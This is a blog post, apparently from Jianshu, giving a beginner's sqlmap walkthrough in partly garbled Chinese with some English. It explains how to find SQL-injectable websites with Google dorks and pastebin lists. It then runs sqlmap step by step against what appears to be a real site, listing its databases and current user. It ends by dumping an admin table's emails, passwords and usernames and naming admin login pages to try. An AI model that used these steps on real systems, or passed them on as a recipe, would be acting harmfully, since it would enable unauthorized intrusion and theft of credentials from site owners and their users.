SqlMap神器的傻瓜使用(以后更新高級用法)





There is 3 ways to find sqli vulnerable websites:


1-

2- Dork : http://encyberpedia.blogspot.com/2013/03/5000-sql-injection-dorks.html

Google Dorks

3- Type "SQL Vulnerable Website pastebin/List" , i like this






使用sqlmap進行試驗:

Google?Dorks:

這次使用:

inurl:.course.php?id=16

1.?對目標網(wǎng)站進行查詢:

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16

//sqlmap?-V?1.0.11,會生成相關(guān)文件,包含payload以及注入類型

參數(shù)介紹:

Parameter:?id?(GET),注入?yún)?shù)為GET注入:

注入類型有:

boolean-based?blind???????//基于布爾的盲注,也就是可以根據(jù)返回頁面判斷條件真假的注入

error-based???//報錯型注入

time-based?blind??//基于時間延遲注入

UNION?query?????//可聯(lián)合查詢注入

此外還有一種為:

stacked?queries?SQL?injection???//可多語句查詢注入

the?back-end?DBMS?is?MySQL,back-end?DBMS:?MySQL?>=?5.0使用數(shù)據(jù)庫為MYSQL,版本為5.x

web?application?technology:?PHP?5.3.29//Web應(yīng)用程序技術(shù)

2.得到數(shù)據(jù)庫:

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?--dbs

[*]efnypvon_icd_db

[*]information_schema

3.web當(dāng)前使用的數(shù)據(jù)庫

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?--current-db

current?database:????'efnypvon_icd_db'

4.web數(shù)據(jù)庫所使用的賬戶

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?--current-user

current?user:????'efnypvon_icd_usr@localhost'

5.具體查看某一數(shù)據(jù)庫:

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?-D?efnypvon_icd_db?--tables

6.查看表的字段

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?-D?efnypvon_icd_db?-T?icd_tbl_admin?--columns

7.得到字段內(nèi)容:

sqlmap.py?-u?http://www.xxx.org.pk/course.php?id=16?-D?efnypvon_icd_db?-T?icd_tbl_admin?"fEmail,fPassword,fUserName,last_admiin,superadmin"?--dump

8.尋找登陸界面

/admin.php???/login.php???/backoffice/login.php?....???:O

Thats?all?:D



最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,208評論 0 5
  • sqlmap也是滲透中常用的一個注入工具,其實在注入工具方面,一個sqlmap就足夠用了,只要你用的熟,秒殺各種工...
    linkally閱讀 7,233評論 1 40
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,567評論 2 22
  • 注入類型:字符型、數(shù)字型、搜索型 注入思路:1.檢測是否存在注入 2.檢測注入類型 3.構(gòu)造注入語句 4.根據(jù)語句...
    捕風(fēng)的王小仲閱讀 1,312評論 0 0
  • ——曾居望京五載,聞望京小腰佳肴,卻未從嘗鮮,看相冊,莫備庭;三人行,遲馳吃,擁堵車坐等一時辰,匆忙趕,失意之,門...
    笨魚也想飛閱讀 278評論 0 1

友情鏈接更多精彩內(nèi)容